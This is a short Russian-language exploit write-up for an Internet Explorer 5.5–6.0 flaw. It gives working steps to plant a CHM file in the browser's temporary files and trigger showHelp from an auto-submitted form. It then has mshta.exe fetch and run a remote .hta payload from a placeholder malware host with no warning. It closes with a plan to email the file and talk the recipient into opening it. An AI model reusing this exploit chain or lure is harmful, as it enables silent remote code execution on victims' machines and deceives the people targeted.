Выполнение произвольного кода в IE 5.5-6.0

В новых версиях Internet Explorer, ничто не может быть активизировано через временные файлы Internet, если не известно полное имя пути, для запросов showHelp и Click() вашей ссылки. Однако, существует возможность создать во временных интернет файлах HTML троян, определить его расположение, и затем записать это расположение к вызову showHelp, и после этого выполняя удаленную ссылку.

Пример:

Создайте *.html файл типа такого:

 <bgsound src="http://www.example.com/malware.chm">

Он переместит наш *.chm во временный Internet файл

Тогда включите скрипт, чтобы определить расположение нашего *.html файла:

malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf("\\"));
path=unescape(path);

Получив информацию о местоположении, создайте простую HTML форму:

 document.write('<FORM name="malware" 
ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');

 document.write('<form>
<input type="hidden" size="40" maxlength="80"
 value="'+path+'\\malware[1].chm"></form>');

Это должно быть записано в форму, которая может быть автоматически представлена:

setTimeout('document.malware.submit()',5000);

Прежде, это сделать, что мы создаем наш очень простой malware.chm и включаем наш объект:

C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta

Теперь мы можем передать ссылку к mshta.exe, которая в свою очередь откроет из удаленного сайта наш *.hta файл, который включает нашу выполнимую программу. Все это без какоко либо предупреждения.

Пример нападения:

Мы создаем наш HTML файл и отсылаем его на уязвимый компьютер (например через почту или новости). Получатель получает почтовое сообщение и приложенный *.html файл. После чего мы убеждаем нашего не подозревающего получателя, открыть созданный .html (хотя некоторые системы предупреждают пользователя при открытии HTML файла, созданный файл не вызовет подозрения, так как он ничем не отличается от безобидного html).

Пример: (включает безопасный *.exe - *.chm для win98):

Уязвимость найдена в IE 5.5-6.0